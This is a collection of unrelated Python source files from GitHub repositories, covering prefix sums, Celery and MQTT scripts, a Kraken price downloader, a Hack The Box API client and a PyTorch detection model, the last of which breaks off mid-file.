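    def __init__(self, matrix):
        rows, cols = len(matrix), len(matrix[0])
        # ps[i][j] holds the sum of matrix[0..i-1][0..j-1]; the extra zero
        # row/column removes all boundary special cases.
        self.ps = [[0] * (cols + 1) for _ in range(rows + 1)]
        for i in range(rows):
            for j in range(cols):
                self.ps[i + 1][j + 1] = (matrix[i][j] + self.ps[i][j + 1]
                                         + self.ps[i + 1][j] - self.ps[i][j])

    def sum_region(self, r1, c1, r2, c2):
        # inclusion-exclusion over the four prefix corners
        ps = self.ps
        return ps[r2 + 1][c2 + 1] - ps[r1][c2 + 1] - ps[r2 + 1][c1] + ps[r1][c1]

# Example: PrefixSumMatrix([[3, 0, 1], [5, 6, 3]]).sum_region(0, 0, 1, 1) -> 14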
sum\n\n\n\n\n \"\"\"\n [[3, 0, 1, 4, 2],\n [5, 6, 3, 2, 1],\n [1, 2, 0, 1, 5],\n [4, 1, 0, 1, 7],\n [1, 0, 3, 0, 5]\n ],\n\n [3, 3, 4, 8, 10],\n [5, 11, 14, 16, 17],\n [1, 3, 3, 4, 9],\n [4, 5, 5, 6, 13],\n [1, 1, 4, 4, 9]\n ]\n \"\"\"\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# obj = NumMatrix(matrix)\n# come there today\n# param_1 = obj.sumRegion(row1,col1,row2,col2)","repo_name":"yakin-ts/Interview-preparation-A2SV","sub_path":"range_sum_query.py","file_name":"range_sum_query.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30418138550","text":"import datetime\n\nfrom run import iha_queue, dha_queue, aa_queue, reuters_queue, ap_queue, hha_queue\nfrom src.tasks.delete_contents import remove_contents_from_cms\nfrom src.tasks.insert_contents import insert_contents\n\n\ndef init_tasks(app, celery, settings):\n @celery.task()\n def insert_contents_to_cms():\n #: check configurations per 30 seconds for run task.\n #: run insert contents to cms job if the configuration next_run_time field is less than or equal to now.\n #: shift next_run_time by configuration interval value\n configs = list(app.db.configurations.find({\n 'next_run_time': {\n '$lte': datetime.datetime.utcnow()\n },\n 'agency_name': {\n '$in': ['AA', 'IHA', 'Reuters', 'AP', 'DHA', 'HHA']\n },\n 'agency_status': 'active'\n }))\n\n for config in configs:\n app.db.configurations.find_and_modify(\n {\n '_id': config['_id']\n },\n {\n '$set': {\n 'next_run_time': datetime.datetime.utcnow() + datetime.timedelta(seconds=int(config['sync_at']))\n }\n }\n )\n\n insert_contents(configs, settings, app.db, app.redis_queue)\n\n @celery.task()\n def delete_expired_contents_from_cms():\n #: get contents from created by the user defined in settings via _query endpoint\n #: remove content if content status is unpublished and\n #: Now date is greater than sum of content's created_at and configuration expire field\n configs = list(app.db.configurations.find({\n 'next_run_time_for_delete': {\n '$lte': datetime.datetime.utcnow()\n },\n 'agency_name': {\n '$in': ['AA', 'IHA', 'Reuters', 'AP', 'DHA', 'HHA']\n },\n 'agency_status': 'active'\n }))\n\n for config in configs:\n app.db.configurations.find_and_modify(\n {\n '_id': config['_id']\n },\n {\n '$set': {\n 'next_run_time_for_delete': datetime.datetime.utcnow() + datetime.timedelta(\n minutes=int(config['expire_time']))\n }\n }\n )\n\n remove_contents_from_cms(configs, settings, app.db, app.redis_queue)\n\n @celery.task()\n def sync_queues_to_mongo():\n agency_queues = {\n 'iha_queue': iha_queue,\n 'dha_queue': dha_queue,\n 'aa_queue': aa_queue,\n 'reuters_queue': reuters_queue,\n 'ap_queue': ap_queue,\n 'hha_queue': hha_queue\n }\n\n for queue in agency_queues.keys():\n for content_id in agency_queues[queue]:\n app.db.queues.save({\n 'agency_type': queue,\n 'content_id': content_id\n })\n\n @celery.task()\n def sync_mongo_to_queues():\n agency_queues = {\n 'iha_queue': iha_queue,\n 'dha_queue': dha_queue,\n 'aa_queue': aa_queue,\n 'reuters_queue': reuters_queue,\n 'ap_queue': ap_queue,\n 'hha_queue': hha_queue\n }\n\n for queue in agency_queues.keys():\n queues_cursor = app.db.queues.find({\n 'agency_type': queue\n }).sort({'_id': -1}).limit(15000)\n\n queues_cursor.sort({'_id': 1})\n for doc in queues_cursor:\n 
agency_queues[queue].append(doc['content_id'])\n","repo_name":"ismetacar/input","sub_path":"src/tasks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"12648359196","text":"import time\r\nfrom paho.mqtt import client as mc\r\n\r\nbroker = 'mqtt.eclipseprojects.io'\r\nclient_id = 'id1'\r\n\r\ndef my_call(client, userdata, flags, rc):\r\n    if rc == 0:\r\n        print(\"Connected to MQTT Broker!\")\r\n    else:\r\n        print(\"Failed to connect, return code %d\\n\", rc)\r\n\r\n\r\ndef publish(client):\r\n    time.sleep(1)\r\n    msg = 30\r\n    result = client.publish('int', msg)\r\n    status = result[0]\r\n    if status == 0:\r\n        print(msg)\r\n    else:\r\n        print(f\"Message not sent {msg}\")\r\n    msg = 'a'\r\n    result = client.publish('char', msg)\r\n    status = result[0]\r\n    if status == 0:\r\n        print(msg)\r\n    else:\r\n        print(f\"Message not sent {msg}\")\r\n    msg = \"String published message\"\r\n    result = client.publish('str', msg)\r\n    status = result[0]\r\n    if status == 0:\r\n        print(msg)\r\n    else:\r\n        print(f\"Message not sent {msg}\")\r\n    \r\n\r\nclient = mc.Client(client_id)\r\nclient.on_connect = my_call\r\nclient.connect(broker)\r\n\r\nclient.loop_start()\r\npublish(client)\r\nclient.loop_stop()\r\n\r\n","repo_name":"Scarlet-15/MQTT-Server","sub_path":"Mqtt_Publish.py","file_name":"Mqtt_Publish.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19410118049","text":"import pathlib\nimport pandas as pd\nimport datetime\n# DB Management\nimport requests\nimport sqlalchemy\nimport streamlit as st\n\ndb_name = 'HLOCV.db'\nroot_dir0 = pathlib.Path(__file__).resolve().parents[0]\ndb_path = 'sqlite:///' + str(pathlib.Path.joinpath(root_dir0, db_name))\n\nengine = sqlalchemy.create_engine(db_path, echo=True, connect_args={\"check_same_thread\": False, 'timeout': 5})\nconn = engine.connect()\n\n\ndef download_ticker_df(ticker, start, interval=1440):\n    \"\"\"\n    Example requ: requests.get('https://api.kraken.com/0/public/OHLC?pair=XBTUSD')\n    :param interval: timeframe in minutes (1d: 1440)\n    :param ticker: str\n    :param start: linuxtmps\n    :return: pd.Dataframe\n    \"\"\"\n    url = 'https://api.kraken.com/0/public/OHLC'\n    params = {'pair': ticker, 'interval': interval, 'since': start}\n    res = requests.get(url, params=params)\n    data = res.json()\n    print(data)\n    if ticker == \"XBTUSD\":\n        df = pd.DataFrame(data['result'][\"XXBTZUSD\"])\n    elif ticker == \"XBTEUR\":\n        df = pd.DataFrame(data['result'][\"XXBTZEUR\"])\n    else:\n        df = pd.DataFrame(data['result'][ticker])\n    df.columns = ['timestamp', 'open', 'high', 'low', 'close', 'vwap', 'volume', 'count']\n\n    # Convert the columns to float\n    df = df.apply(pd.to_numeric, errors='coerce')\n\n    df['ticker'] = ticker\n    return df\n\n\ndef add_ohlc(ticker, start):\n    df = download_ticker_df(ticker, start)\n    df.to_sql(ticker, engine, if_exists='replace', index=False)\n\n\ndef get_ohlc_from_db(ticker):\n    sqlite_query_string = sqlalchemy.sql.text(f\"SELECT * FROM {ticker}\")\n    df = pd.read_sql(sqlite_query_string, con=conn)\n    return df\n\n\ndef get_ticker_from_db(ticker, timestamp):\n    \"\"\"\n    :param ticker: str (SOLEUR)\n    :param timestamp: linux timestamp\n    :return:\n    return df like:\n    timestamp     open   high    low  close   vwap        volume  count   ticker\n    0  1672012800  10.68  10.8  10.4  10.63  10.56  36129.483519   1115  SOLEUR\n    \"\"\"\n    sqlite_query_string = 
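# --- Aside: a hedged sketch of binding query values instead of interpolating them. ---
# f-string interpolation into SQL (as in the queries around here) is injection-prone
# for untrusted input. SQLAlchemy's text() supports bound parameters for values;
# table names cannot be bound, so validating the ticker against a whitelist is an
# assumption this sketch leaves to the caller.
import sqlalchemy

def ohlc_row_query(ticker):
    assert ticker.isalnum(), "validate the table name separately"
    return sqlalchemy.sql.text(
        f"SELECT * FROM {ticker} WHERE timestamp = :ts"  # :ts is a bound parameter
    )

# Usage sketch: conn.execute(ohlc_row_query("SOLEUR"), {"ts": 1672012800})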
sqlalchemy.sql.text(f\"SELECT * FROM {ticker} WHERE timestamp = '{timestamp}'\")\n df = pd.read_sql(sqlite_query_string, con=conn)\n if df.empty:\n st.error(f\"ticker: {ticker} or/and timestamp: {timestamp} not in database\")\n st.stop()\n return df\n\n\ndef add_list_of_ohlc(ticker_list, start):\n for ticker in ticker_list:\n add_ohlc(ticker, start)\n\n\ndef get_list_of_ohlc_from_db(ticker_list):\n df_list = []\n for ticker in ticker_list:\n df_list.append(get_ohlc_from_db(ticker))\n return df_list\n\n\ndef close_db_connection(self):\n self.conn.close()\n","repo_name":"RaphaelBecker/staking_rewards","sub_path":"data_requests.py","file_name":"data_requests.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19562802448","text":"import utils_sickle_stats as utils\nimport numpy as np\nimport pandas as pd\nimport os\nimport datetime\nimport pytz\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nlogger = utils.logger\n\n\ndef main(args):\n logger.info('==================================')\n logger.info('PLOT FIGURES')\n\n pix_dir = os.path.join(args.working_dir, 'figures')\n utils.safe_mkdir(pix_dir)\n\n filename = os.path.join(\n args.confidential_dir, args.clean_file)\n df = pd.read_csv(filename)\n\n if True:\n # Plot length of time of after transfusion until SPRT confidence is\n # achieved.\n df_treated = df.iloc[df.patient_treated.values]\n\n transfusion_dates = np.sort(\n np.unique(df_treated.infusion_epoch.values))\n transfusion_dates = [datetime.datetime.fromtimestamp(\n t, tz=pytz.utc) for t in transfusion_dates]\n end_date = datetime.datetime(2018, 10, 1)\n\n transfusion_dates_mpl = [mdates.date2num(t) for t in transfusion_dates]\n end_date_mpl = 6 * [mdates.date2num(end_date)]\n\n date_duration = [end_date_mpl[i] - transfusion_dates_mpl[i]\n for i in range(6)]\n plt.figure(figsize=(8, 6))\n plt.barh(1 + np.arange(len(transfusion_dates)), date_duration,\n left=transfusion_dates_mpl,\n alpha=.7\n )\n d1 = mdates.date2num(datetime.datetime(2018, 1, 31))\n plt.plot([d1, d1], [0, 6.5], ':', label='95% confidence')\n\n d2 = mdates.date2num(datetime.datetime(2018, 2, 26))\n plt.plot([d2, d2], [0, 6.5], ':', label='99% confidence')\n plt.legend()\n plt.ylabel('Subject')\n plt.xlabel('Time since transfusion')\n plt.ylim([.5, 6.5])\n # We need to tell matplotlib that these are dates...\n ax = plt.gca()\n ax.xaxis_date()\n # Rotate date ticks so they're legible\n plt.gcf().autofmt_xdate()\n\n ax.axis('tight')\n\n filename = os.path.join(pix_dir, 'SPRT_vanilla.png')\n plt.savefig(filename)\n\n\nif __name__ == '__main__':\n args = utils.parse_arguments()\n utils.initialize_logger(args)\n main(args)\n","repo_name":"wfbradley/sickle_stats","sub_path":"A90_plot_figures.py","file_name":"A90_plot_figures.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1546675213","text":"import torch, os, shutil, time\n\nFROM_DIR = r\"C:\\Users\\xmk233\\.cache\\torch\\transformers\"\nFILE_PATH = r\"J:\\ModelStoreData\\PyTorchHub\\2020-01-07\\files\\PyTorch-Transformers\"\ndef test(model_name):\n time.sleep(1)\n # try:\n ###\n print(\"Downloading {}...\".format(model_name))\n if model_name == \"gpt2-large\" or model_name == \"gpt2-xl\": \n model = torch.hub.load('huggingface/pytorch-transformers', 'model', model_name, from_tf = True)\n else:\n model = 
torch.hub.load('huggingface/pytorch-transformers', 'model', model_name)\n ######\n shutil.move(FROM_DIR, os.path.join(FILE_PATH, model_name))\n # except:\n # with open(\"failed_transformer.txt\", \"a\") as ft:\n # ft.write(\"{}\\n\".format(model_name))\n return\n\n# test('bert-base-cased')\n# test('bert-base-german-dbmdz-cased')\n# test('bert-base-german-dbmdz-uncased')\n# test('bert-base-japanese')\n# test('bert-base-japanese-char')\n# test('bert-base-japanese-char-whole-word-masking')\n# test('bert-base-japanese-whole-word-masking')\n# test('bert-base-multilingual-cased')\n# test('bert-base-uncased')\n# test('bert-large-cased')\n# test('bert-large-cased-whole-word-masking')\n# test('bert-large-cased-whole-word-masking-finetuned-squad')\n# test('bert-large-uncased')\n# test('bert-large-uncased-whole-word-masking')\n# test('bert-large-uncased-whole-word-masking-finetuned-squad')\n# test('distilbert-base-german-cased')\n# test('distilbert-base-multilingual-cased')\n# test('distilbert-base-uncased')\n# test('distilbert-base-uncased-distilled-squad')\n# test('gpt2')\n# test('gpt2-large')\n# test('gpt2-medium')\n# test('gpt2-xl')\n# test('openai-gpt')\n# test('roberta-base')\n# test('roberta-base-openai-detector')\n# test('roberta-large')\n# test('roberta-large-openai-detector')\n# test('transfo-xl-wt103')\n# test('xlm-clm-ende-1024')\n# test('xlm-clm-enfr-1024')\n# test('xlm-mlm-ende-1024')\n# test('xlm-mlm-enfr-1024')\n# test('xlm-mlm-tlm-xnli15-1024')\n# test('xlm-mlm-xnli15-1024')\n# test('xlnet-base-cased')\n# test('xlnet-large-cased')\n\n## the following is the 2020-04-12 newly added ones. \n# test('bert-base-finnish-cased-v1')\n# test('bert-base-cased-finetuned-mrpc')\n# test('distilbert-base-cased-distilled-squad')\n# test('roberta-large-mnli')\n# test('xlm-mlm-enro-1024')\n# test('distilgpt2')\n# test('bert-base-finnish-uncased-v1')\n# test('xlm-mlm-en-2048')\n# test('bert-base-multilingual-uncased')\n# test('bert-base-chinese')\n# test('xlm-mlm-100-1280')\n# test('distilroberta-base')\n# test('distilbert-base-cased')\ntest('xlm-mlm-17-1280')\ntest('bert-base-dutch-cased')\ntest('bert-base-german-cased')","repo_name":"XMK233/EMSE2020_MLPackage","sub_path":"Crawler/forPyTorchHub/crawler/crawler/4-huggingface_transformer.py","file_name":"4-huggingface_transformer.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42619497043","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 21 11:25:21 2016\n\n@author: u0107775\n\"\"\"\nimport pandas as pd\n\ntable = '/Users/u0107775/Data/Mitochondria_Deletion/Fastq/Fastq_files/pindel/testPipeline/testConfig.filter.txt'\noutput = '/Users/u0107775/Data/Mitochondria_Deletion/Fastq/Fastq_files/pindel/testPipeline/testConfig.calc.txt'\n\n# Read in the vcf to table file using both the tab and comma delimiters to split the allele counts\ndf = pd.read_csv(table, sep='\\t|,', engine='python')\n# Pandas only counts the number of columns that are tab delimited. 
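# --- Aside: a hedged sketch (toy data) of reading mixed delimiters in pandas. ---
# A regex separator requires engine="python"; when data rows split into more
# fields than the header row has names, passing explicit names avoids the
# write-then-reload workaround used in the snippet around this point.
import io
import pandas as pd

raw = "id\tcounts\nA\t10,3\nB\t7,0\n"
df = pd.read_csv(io.StringIO(raw), sep=r"\t|,", engine="python",
                 skiprows=1, names=["id", "REF", "DEL"])
# df now has columns id/REF/DEL with the comma-joined counts split apart.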
Therefore write immediately to file and reload table\ndf.to_csv(output, sep='\\t')\n\n# Extract the general column names and then extract the sample specific column names\ncolHeader = list(df.columns.values)[0:7]\nsampleNames = list(df.columns.values)[7:]\n\n# Initialize a new column header and for each sample append reference and deletion names\nsampleCounts = []\nfor name in sampleNames:\n newName = name[:-3]\n refCounts = newName + '.REF'\n delCounts = newName + '.DEL'\n sampleCounts.append(refCounts)\n sampleCounts.append(delCounts)\n\n# Cncatenate the general and sample-specific column names\nnewHeader = colHeader + sampleCounts\n\n# Read in the fresh file that should have the correct number of columns.\ndf2 = pd.read_csv(output, sep='\\t', skiprows=1, header=None, index_col=False)\n# Replace with the new column headers and write to file\ndf2.columns = newHeader\n\n\n# Calculate the allele frequency\nfor column in df2:\n # Extract columns containing reference read counts\n if '.REF' in column:\n # Extract sample names\n sampleName = column[:-4]\n # Generate column headers for indexing based on sample name\n refReads = '{}.REF'.format(sampleName)\n delReads = '{}.DEL'.format(sampleName)\n # Convert the deletions to floating point number, otherwise integer division is performed\n numerator = df2[delReads].apply(float)\n denominator = (df2[refReads].apply(float)) + numerator\n # Write new column label\n columnLabel = sampleName + '_freq'\n # Perform allele frequency calculation\n df2[columnLabel] = (numerator / (numerator + df2[refReads]))\n\ndf2.to_csv(output, sep='\\t')","repo_name":"dvbrown/Pipelines","sub_path":"Ruffus_python/pindel_mtDNA/splitTablecomma.py","file_name":"splitTablecomma.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"7789040977","text":"\"\"\"\nExamples:\n Starting a challenge and submitting the flag::\n\n challenge = client.get_challenge(100)\n instance = challenge.start()\n r = remote(instance.ip, instance.port)\n # Do the challenge.....\n instance.stop()\n challenge.submit(flag, difficulty=50)\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport time\nfrom datetime import datetime\nfrom typing import List, Optional, cast, TYPE_CHECKING\n\nimport dateutil.parser\n\nfrom . 
import htb\nfrom .constants import DOWNLOAD_COOLDOWN\nfrom .errors import (\n IncorrectFlagException,\n IncorrectArgumentException,\n NoDockerException,\n NoDownloadException,\n RateLimitException,\n)\n\nif TYPE_CHECKING:\n from .htb import HTBClient\n from .user import User\n\n\nclass Challenge(htb.HTBObject):\n \"\"\"The class representing Hack The Box challenges\n\n Attributes:\n name (str): The name of the challenge\n retired: Whether the challenge is retired\n difficulty: The official difficulty of the challenge\n avg_difficulty: The average user-given difficulty\n points: The points awarded on completion\n difficulty_ratings: A dict of difficulty ratings given\n solves: The number of solves a challenge has\n likes: The number of likes a challenge has\n dislikes: The number of dislikes a challenge has\n release_date: The date the challenge was released\n solved: Whether the active user has completed the challenge\n is_liked: Whether the active user has liked the challenge\n is_disliked: Whether the active user has disliked the challenge\n\n description: The challenge description\n category: The name of the category\n has_download: Whether the challenge has a download available\n has_docker: Whether the challenge has a remote instance available\n\n \"\"\"\n\n name: str\n retired: bool\n difficulty: str\n avg_difficulty: int\n points: int\n difficulty_ratings = None\n solves: int\n likes: int\n dislikes: int\n release_date: datetime\n solved: bool\n is_liked: bool\n is_disliked: bool\n recommended: bool\n\n # noinspection PyUnresolvedReferences\n _authors: Optional[List[\"User\"]] = None\n _author_ids: List[int]\n\n _detailed_attributes = (\n \"description\",\n \"category\",\n \"has_download\",\n \"has_docker\",\n \"instance\",\n )\n description: str\n category: str\n has_download: bool\n has_docker: bool\n instance: Optional[DockerInstance]\n\n def submit(self, flag: str, difficulty: int):\n \"\"\"Submits a flag for a Challenge\n\n Args:\n flag: The flag for the Challenge\n difficulty: A rating between 10 and 100 of the Challenge difficulty.\n Must be a multiple of 10.\n\n \"\"\"\n if difficulty < 10 or difficulty > 100 or difficulty % 10 != 0:\n raise IncorrectArgumentException(\n reason=\"Difficulty must be a multiple of 10, between 10 and 100\"\n )\n\n submission = cast(\n dict,\n self._client.do_request(\n \"challenge/own\",\n json_data={\n \"flag\": flag,\n \"challenge_id\": self.id,\n \"difficulty\": difficulty,\n },\n ),\n )\n if submission[\"message\"] == \"Incorrect flag\":\n raise IncorrectFlagException\n return True\n\n def start(self) -> DockerInstance:\n \"\"\"\n Requests the challenge be started\n\n Returns:\n The DockerInstance that was started\n\n \"\"\"\n if not self.has_docker:\n raise NoDockerException\n instance = cast(\n dict,\n self._client.do_request(\n \"challenge/start\", json_data={\"challenge_id\": self.id}\n ),\n )\n # TODO: Handle failure to start\n self.instance = DockerInstance(\n instance[\"ip\"], instance[\"port\"], self.id, self._client, instance[\"id\"]\n )\n return self.instance\n\n def download(self, path=None) -> str:\n \"\"\"\n\n Args:\n path: The name of the zipfile to download to. 
If none is provided, it is saved to the current directory.\n\n Returns: The path of the file\n\n \"\"\"\n if not self.has_download:\n raise NoDownloadException\n if self._client.challenge_cooldown > time.time():\n raise RateLimitException(\n \"Challenge download ratelimit exceeded - please do not remove this\"\n )\n if path is None:\n path = os.path.join(os.getcwd(), f\"{self.name}.zip\")\n data = cast(\n bytes,\n self._client.do_request(f\"challenge/download/{self.id}\", download=True),\n )\n self._client.challenge_cooldown = int(time.time()) + DOWNLOAD_COOLDOWN\n with open(path, \"wb\") as f:\n f.write(data)\n return path\n\n # noinspection PyUnresolvedReferences\n @property\n def authors(self) -> List[\"User\"]:\n \"\"\"Fetch the author(s) of the Challenge\n\n Returns: List of Users\n\n \"\"\"\n if not self._authors:\n self._authors = []\n for uid in self._author_ids:\n self._authors.append(self._client.get_user(uid))\n return self._authors\n\n def __repr__(self):\n return f\"\"\n\n # noinspection PyUnresolvedReferences\n def __init__(self, data: dict, client: \"HTBClient\", summary: bool = False):\n \"\"\"Initialise a `Challenge` using API data\"\"\"\n self._client = client\n self._detailed_func = client.get_challenge # type: ignore\n self.id = data[\"id\"]\n self.name = data[\"name\"]\n self.retired = bool(data[\"retired\"])\n self.points = int(data[\"points\"])\n self.difficulty = data[\"difficulty\"]\n self.difficulty_ratings = data[\"difficulty_chart\"]\n self.solves = data[\"solves\"]\n self.solved = data[\"authUserSolve\"]\n self.likes = data[\"likes\"]\n self.dislikes = data[\"dislikes\"]\n self.release_date = dateutil.parser.parse(data[\"release_date\"])\n if not summary:\n self.description = data[\"description\"]\n self.category = data[\"category_name\"]\n self._author_ids = [data[\"creator_id\"]]\n if data[\"creator2_id\"]:\n self._author_ids.append(data[\"creator2_id\"])\n self.has_download = data[\"download\"]\n self.has_docker = data[\"docker\"]\n if data[\"docker_ip\"]:\n self.instance = DockerInstance(\n data[\"docker_ip\"], data[\"docker_port\"], self.id, self._client\n )\n else:\n self.instance = None\n else:\n self._is_summary = True\n\n\nclass DockerInstance:\n \"\"\"Representation of an active Docker container instance of a Challenge\n\n Attributes:\n container_id: The ID of the container\n port: The port the container is listening on\n ip: The IP the instance can be reached at\n chall_id: The connected challenge\n client: The passed-through API client\n\n \"\"\"\n\n id: str\n port: int\n ip: str\n chall_id: int\n client: htb.HTBClient\n\n def __init__(\n self,\n ip: str,\n port: int,\n chall_id: int,\n client: htb.HTBClient,\n container_id: str = None,\n ):\n self.client = client\n self.id = container_id or \"\"\n self.port = port\n self.ip = ip\n self.chall_id = chall_id\n\n def stop(self):\n \"\"\"Request the instance be stopped. 
Zeroes out all properties\"\"\"\n self.client.do_request(\n \"challenge/stop\", json_data={\"challenge_id\": self.chall_id}\n )\n # TODO: Handle failures to stop\n","repo_name":"0x4xel/HTNotes","sub_path":"hackthebox/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"27"} +{"seq_id":"21080565006","text":"import paho.mqtt.client as mqtt\nimport time\nimport json\n\nMQTT_HOST= \"broker.emqx.io\"\nMQTT_PORT = 1883\nMQTT_KEEPALIVE_INTERVAL = 60\n\nMQTT_SUB_TOPIC = \"mobile/gusdnr/sensing\"\n\ndef on_message(client, userdata, message):\n result = str(message.payload.decode(\"utf-8\"))\n sensing = json.loads(result)\n print(f\"temperature = {sensing['temperature']}\")\n print(f\"humidity = {sensing['humidity']}\")\n\nclient = mqtt.Client()\nclient.on_message = on_message\n\nclient.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)\nclient.subscribe(MQTT_SUB_TOPIC)\nclient.loop_start()\n\ntry:\n while True:\n time.sleep(5)\n print(\"Waiting\")\n \nexcept KeyboardInterrupt:\n print(\"I'm done!!\")\nfinally:\n client.disconnect\n","repo_name":"hw1203/python","sub_path":"mqtt/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14570754068","text":"import gmpy2, time\nstart_time = time.time()\n\ntruncatable_primes = []\nn_test = 11\nstep = 2\n\nwhile len(truncatable_primes) < 11:\n\n\tif gmpy2.is_prime(n_test):\n\t\ttruncatable_prime = True\n\t\tfor i in range(1, len(str(n_test))):\n\t\t\tif not gmpy2.is_prime(int(str(n_test)[i:])) or \\\n\t\t\tnot gmpy2.is_prime(int(str(n_test)[:-i])):\n\t\t\t\ttruncatable_prime = False\n\t\t\t\tbreak\n\n\t\tif truncatable_prime:\n\t\t\ttruncatable_primes.append(n_test)\n\n\tn_test += step\n\tstep = 2 if step==4 else 4\n\nprint()\nprint('sum of left/right truncatable primes: '+ str(sum(truncatable_primes)))\nprint('runtime: %s sec' % (time.time() - start_time))\nprint()\n","repo_name":"johnakitto/project_euler","sub_path":"euler_037.py","file_name":"euler_037.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6633398149","text":"from math import ceil\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass DrSpaam(nn.Module):\n def __init__(\n self,\n dropout=0.5,\n num_pts=48,\n alpha=0.5,\n embed_len=128,\n win_size=7,\n pano_scan=False,\n cls_loss=None,\n ):\n super(DrSpaam, self).__init__()\n\n self.dropout = dropout\n\n # backbone\n self.conv_u1 = nn.Sequential(\n self._conv_1d(1, 64), self._conv_1d(64, 64), self._conv_1d(64, 128)\n )\n self.conv_u2 = nn.Sequential(\n self._conv_1d(128, 128), self._conv_1d(128, 128), self._conv_1d(128, 256)\n )\n self.conv_u3 = nn.Sequential(\n self._conv_1d(256, 256), self._conv_1d(256, 256), self._conv_1d(256, 512)\n )\n self.conv_u4 = nn.Sequential(self._conv_1d(512, 256), self._conv_1d(256, 128))\n\n # detection layer\n self.head_cls = nn.Conv1d(128, 1, kernel_size=1)\n self.head_reg = nn.Conv1d(128, 2, kernel_size=1)\n\n # spatial attention\n self.spatial_attention_memory = _SpatialAttentionMemory(\n n_pts=int(ceil(num_pts / 4)),\n n_channel=256,\n embed_len=embed_len,\n alpha=alpha,\n win_size=win_size,\n pano_scan=pano_scan,\n )\n\n # initialize weights\n for idx, module in enumerate(self.modules()):\n if isinstance(module, 
(nn.Conv1d, nn.Conv2d)):\n nn.init.kaiming_normal_(module.weight, a=0.1, nonlinearity=\"leaky_relu\")\n elif isinstance(module, (nn.BatchNorm1d, nn.BatchNorm2d)):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def forward(self, signal, inference=False):\n\n n_bs, n_cutout, n_scan, n_pc = signal.shape\n\n if not inference:\n self.spatial_attention_memory.reset()\n\n # process scan sequentially\n n_scan = signal.shape[2]\n for i in range(n_scan):\n signal_i = signal[:, :, i, :] # (bs, cutout, pc)\n\n # extract feature from current scan\n flow = signal_i.view(n_bs * n_cutout, 1, n_pc)\n flow = self._conv_et_pool_1d(flow, self.conv_u1) # /2\n flow = self._conv_et_pool_1d(flow, self.conv_u2) # /4\n flow = flow.view(n_bs, n_cutout, flow.shape[-2], flow.shape[-1]) # (bs, cutout, C, pc)\n\n # combine current feature with memory\n flow, sim_score = self.spatial_attention_memory(flow) # (bs, cutout, C, pc)\n\n # detection using combined feature memory\n flow = flow.view(n_bs * n_cutout, flow.shape[-2], flow.shape[-1])\n flow = self._conv_et_pool_1d(flow, self.conv_u3) # /8\n flow = self.conv_u4(flow)\n flow = F.avg_pool1d(flow, kernel_size=flow.shape[-1]) # (bs * cutout, C, 1)\n\n pred_cls = self.head_cls(flow).view(n_bs, n_cutout, -1) # (bs, cutout, cls)\n pred_reg = self.head_reg(flow).view(n_bs, n_cutout, 2) # (bs, cutout, 2)\n\n return pred_cls, pred_reg, sim_score\n\n def _conv_et_pool_1d(self, signal, conv_block):\n flow = conv_block(signal)\n flow = F.max_pool1d(flow, kernel_size=2)\n if self.dropout > 0:\n flow = F.dropout(flow, p=self.dropout, training=self.training)\n\n return flow\n\n def _conv_1d(self, in_channel, out_channel):\n return nn.Sequential(\n nn.Conv1d(in_channel, out_channel, kernel_size=3, padding=1),\n nn.BatchNorm1d(out_channel),\n nn.LeakyReLU(negative_slope=0.1, inplace=True),\n ) \n\n\nclass _SpatialAttentionMemory(nn.Module):\n def __init__(\n self, n_pts, n_channel, embed_len, alpha, win_size, pano_scan\n ):\n \n super(_SpatialAttentionMemory, self).__init__()\n self._alpha = alpha\n self._win_size = win_size\n self._embed_len = embed_len\n self._pano_scan = pano_scan\n\n self.atten_mem = None\n self.neighbour_masks = None\n self.neighbour_inds = None\n\n self.custom_conv = nn.Sequential(\n nn.Conv1d(n_channel, self._embed_len, kernel_size=n_pts, padding=0),\n nn.BatchNorm1d(self._embed_len),\n nn.LeakyReLU(negative_slope=0.1, inplace=True),\n )\n\n for idx, module in enumerate(self.modules()):\n if isinstance(module, (nn.Conv1d, nn.Conv2d)):\n nn.init.kaiming_normal_(module.weight, a=0.1, nonlinearity=\"leaky_relu\")\n elif isinstance(module, (nn.BatchNorm1d, nn.BatchNorm2d)):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def reset(self):\n self.atten_mem = None\n\n def forward(self, sig_new):\n if self.atten_mem is None:\n self.atten_mem = sig_new\n return self.atten_mem, None\n\n n_batch, n_cutout, n_channel, n_pts = sig_new.shape\n\n \n self.neighbour_masks, self.neighbour_inds = self._generate_neighbour_masks(\n sig_new\n )\n\n embed_x = self.custom_conv(\n sig_new.view(-1, n_channel, n_pts)\n ).view(-1, 